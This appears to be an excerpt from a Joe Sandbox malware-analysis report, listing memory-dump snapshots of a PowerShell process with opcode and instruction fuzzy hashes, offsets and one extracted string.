                                • Instruction ID: a57041d2a5d57d248cec44ef8a92fa942de46501bc17daab9a6c976fa7e9fd29
                                • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                • Instruction Fuzzy Hash: 3A11DD75544280CFCB01DF14D5C4B15BFA1FB84324F28C6AAE8494F756C33AD84ACB61
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710408888.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_9dd000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0ef84d0e86284ca8fe4e39e7d44907599ab1e220d4927fdbf7f38b9e4985dc0
                                • Instruction ID: 041e1e00b0a164b63c339ab85faa74d700795276b6d64471393b008ceb982dc5
                                • Opcode Fuzzy Hash: a0ef84d0e86284ca8fe4e39e7d44907599ab1e220d4927fdbf7f38b9e4985dc0
                                • Instruction Fuzzy Hash: D511DD76545280CFCB12DF10D5C4B16BB61FB84324F28C2AAD8480B746C33AD80ACBA2
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cefc7bf1bfa122a9df6783f06d935dd6ffc2324f5003c0ffe8f4e0430715ad4b
                                • Instruction ID: 9b2376dbb6b3b9f57cd1354396206ba36402079641f3789de05998a1b49eb836
                                • Opcode Fuzzy Hash: cefc7bf1bfa122a9df6783f06d935dd6ffc2324f5003c0ffe8f4e0430715ad4b
                                • Instruction Fuzzy Hash: 4E11D230C2424CCBDF24DBD4E5997FDB7B1AB49319F14142AE101B6196EB745C8ACB26
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710408888.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_9dd000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4e0f723e9fc1681defad94f39701b689fcb7b2e9ab0900864e3ea9382ec752c2
                                • Instruction ID: ee6b5e2e134dbb3756b1dfc6032684947ca7661ba75a517b874b7488011f593f
                                • Opcode Fuzzy Hash: 4e0f723e9fc1681defad94f39701b689fcb7b2e9ab0900864e3ea9382ec752c2
                                • Instruction Fuzzy Hash: 3A01F23104A340AAE7108A29CD84B67BF9CEF81364F18C92BEC084B346C2799841CAB1
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710408888.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_9dd000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 48b8684fc64c61f19e7d36a94a051187f165ba3c41398e148839af5956762325
                                • Instruction ID: fce6a349777ff5210618d16509d2ee2706a77b3ffb9751a4e9bd5c1b72564ac0
                                • Opcode Fuzzy Hash: 48b8684fc64c61f19e7d36a94a051187f165ba3c41398e148839af5956762325
                                • Instruction Fuzzy Hash: A7015E6200E3C09ED7128B25CC94B56BFB8EF53224F1CC5DBD8888F293C2699849C772
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6c9ae95619f2db695678e82734e072cad73c55c8a67cd5622cd55c9817914635
                                • Instruction ID: 35b2ee44ff5a890844f86a6adc57f4e380ad3fa46fe518faabe3a43246822faa
                                • Opcode Fuzzy Hash: 6c9ae95619f2db695678e82734e072cad73c55c8a67cd5622cd55c9817914635
                                • Instruction Fuzzy Hash: F8F0F635B041244BD326ABACA0083B5778ACBC0355F09C0AAE64C8F7C3DA66AC4187D1
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d8c9b9806083230a29bcaa33139316e1cd79276dd99037dd83d3c842a2493266
                                • Instruction ID: 22cfbca00996c5745c33f69d73b16576e2999b776d2efff4c0bda73bf76029ca
                                • Opcode Fuzzy Hash: d8c9b9806083230a29bcaa33139316e1cd79276dd99037dd83d3c842a2493266
                                • Instruction Fuzzy Hash: DAF02720A082954BE3279B68D1087A03F919F82308F0A80EDE9484F6E3C765AC41C381
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: \VLm
                                • API String ID: 0-2808160488
                                • Opcode ID: 4b6fd6e2caab9e314bd891a0f3528bd8fb442bae655024eb34a65d9fa170d943
                                • Instruction ID: 013b878509fa8c88ff36ac437096ba281bb4e1867f0511b172e34a1a021fa74f
                                • Opcode Fuzzy Hash: 4b6fd6e2caab9e314bd891a0f3528bd8fb442bae655024eb34a65d9fa170d943
                                • Instruction Fuzzy Hash: 9F915A70E1020D8FDF10DFE9C9857ADBBF2AF88354F148129E909E7294EB749845CBA1